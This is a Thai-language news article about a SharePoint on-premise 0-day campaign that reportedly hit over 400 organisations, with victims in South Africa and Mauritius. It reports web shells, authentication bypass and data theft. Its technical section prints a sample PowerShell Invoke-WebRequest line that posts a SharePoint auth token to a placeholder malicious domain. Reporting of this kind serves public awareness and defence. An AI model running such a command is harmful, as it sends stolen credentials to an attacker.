การโจมตีทางไซเบอร์ที่ซับซ้อนซึ่งใช้ช่องโหว่ 0-day ใน Microsoft SharePoint Servers ได้โจมตีองค์กรกว่า 400 แห่งทั่วโลก และส่งผลกระทบอย่างมีนัยสำคัญในประเทศต่าง ๆ ในแอฟริกา รวมถึงแอฟริกาใต้ และมอริเชียส
การโจมตีนี้มุ่งเป้าไปที่องค์กรที่มีการใช้งาน SharePoint ในองค์กรแบบ on-premise โดยการใช้ช่องโหว่ด้านความปลอดภัยที่ไม่เคยถูกพบมาก่อน ซึ่งทำให้ผู้โจมตีสามารถแทรกซึมเข้าระบบโครงสร้างพื้นฐานที่สำคัญที่เป็นของหน่วยงานรัฐบาล, สถาบันการศึกษา และบริษัทเอกชนได้
แคมเปญมัลแวร์นี้เริ่มต้นขึ้นเมื่อสัปดาห์ที่แล้ว เมื่อบริษัทด้านความปลอดภัยทางไซเบอร์ของเนเธอร์แลนด์ Eye Security ตรวจพบการโจมตีระลอกแรก
แตกต่างจากช่องโหว่ใน SharePoint ทั่วไปที่ส่งผลกระทบต่อการใช้งานที่โฮสต์บนคลาวด์ ช่องโหว่ 0-day นี้มุ่งเป้าไปที่องค์กรที่ใช้งาน SharePoint servers บนโครงสร้างพื้นฐานของตนเองโดยเฉพาะ ซึ่งเป็นระบบที่หลายองค์กรเลือกใช้เพื่อการควบคุม และความปลอดภัยที่เพิ่มขึ้น
ช่องทางการโจมตีใช้ความสามารถในการรันโค้ดที่ไม่ได้รับอนุญาตภายใน Framework ของการทำงานร่วมกันของเอกสารใน SharePoint ซึ่งทำให้ผู้โจมตีสามารถสร้างการเข้าถึงไปยังเครือข่ายที่เป็นเป้าหมายได้อย่างต่อเนื่อง
นักวิเคราะห์จาก Business Insider Africa ระบุพฤติกรรมที่ซับซ้อนของมัลแวร์ โดยสังเกตเห็นความสามารถหลบเลี่ยงการตรวจจับขณะขโมยข้อมูลสำคัญจากระบบที่ถูกบุกรุก
ในแอฟริกาใต้เพียงแห่งเดียว เหยื่อของการโจมตีนี้ครอบคลุมหลายภาคส่วน รวมถึงผู้ผลิตยานยนต์รายใหญ่, มหาวิทยาลัยหลายแห่ง, หน่วยงานรัฐบาลท้องถิ่น และกระทรวงการคลังแห่งชาติ โดยพบมัลแวร์ในเว็บไซต์ Infrastructure Reporting Model
กลไกการติดมัลแวร์ และการวิเคราะห์ทางเทคนิค
ช่องโหว่ 0-day ใน SharePoint ใช้ช่องโหว่ในการเรียกใช้โค้ดที่เป็นอันตรายจากระยะไกลในกลไกการยืนยันตัวตนของเซิร์ฟเวอร์ ซึ่งช่วยให้ผู้โจมตีสามารถ bypass การควบคุมความปลอดภัยตามมาตรฐานได้
การวิเคราะห์ทางเทคนิคเผยให้เห็นว่ามัลแวร์ใช้ระบบส่ง payload ที่มีหลายขั้นตอน
# ตัวอย่างของช่องทางการโจมตีที่อาจเกิดขึ้น
Invoke-WebRequest -Uri "http://malicious-domain/payload.aspx"
-Method POST -Body $sharepoint_auth_token
การโจมตีเริ่มต้นด้วยการสแกนเพื่อสำรวจเป้าหมายที่ใช้ SharePoint farms เวอร์ชันที่มีช่องโหว่ จากนั้นผู้โจมตีจะใช้ช่องโหว่ในการ bypass การยืนยันตัวตนเพื่อแทรก web shells ที่เป็นอันตราย โดย Microsoft ได้ยืนยันว่าช่องโหว่นี้ส่งผลกระทบเฉพาะการติดตั้ง SharePoint แบบ on-premise เท่านั้น โดยบริการ SharePoint Online ที่โฮสต์บนคลาวด์ยังคงปลอดภัยผ่านโครงสร้างความปลอดภัยที่จัดการโดย Microsoft
ที่มา : cybersecuritynews
You must be logged in to post a comment.